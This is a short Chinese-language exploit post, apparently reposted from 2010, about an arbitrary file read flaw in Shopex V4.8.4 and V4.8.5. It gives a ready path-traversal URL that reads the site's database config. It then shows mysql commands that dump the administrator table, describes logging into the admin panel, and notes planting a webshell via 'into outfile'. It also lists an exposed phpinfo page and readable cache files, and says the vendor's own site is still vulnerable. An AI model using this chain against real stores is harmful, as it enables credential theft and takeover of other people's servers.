作者:明依丞 | 来源:互联网 | 2017-11-11 18:03
发布日期:2010-04-22发布作者:dbgger影响版本:ShopexV4.8.4V4.8.5漏洞描述:文件过滤不严,导致任意文件读取漏洞。测试代码:http:www.xxxx.comshopadminindex.php?ctlsfileactgetDBp[0]....configconfig.php可以连上数据库.mysql-
发布日期:2010-04-22
发布作者:dbgger
影响版本: Shopex V4.8.4 V4.8.5
漏洞描述: 文件过滤不严,导致任意文件读取漏洞。
测试代码:
http://www.xxxx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php
可以连上数据库.
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理员用户密码./shopadmin/ 登陆
后台拿shell,没有仔细研究.
我测试的站,直接用into outfile 一个shell.
网上有个帖子,说可以爆物理路径.测试不可用.
如果install目录没删.下面这个可以看phpinfo
http://www.target.com/install/svinfo.php?phpinfo=true
另外/home/cache/目录的文件,也是可以爆出来的.
目前shopex 官方站,仍然存在该漏洞. 测试截图如下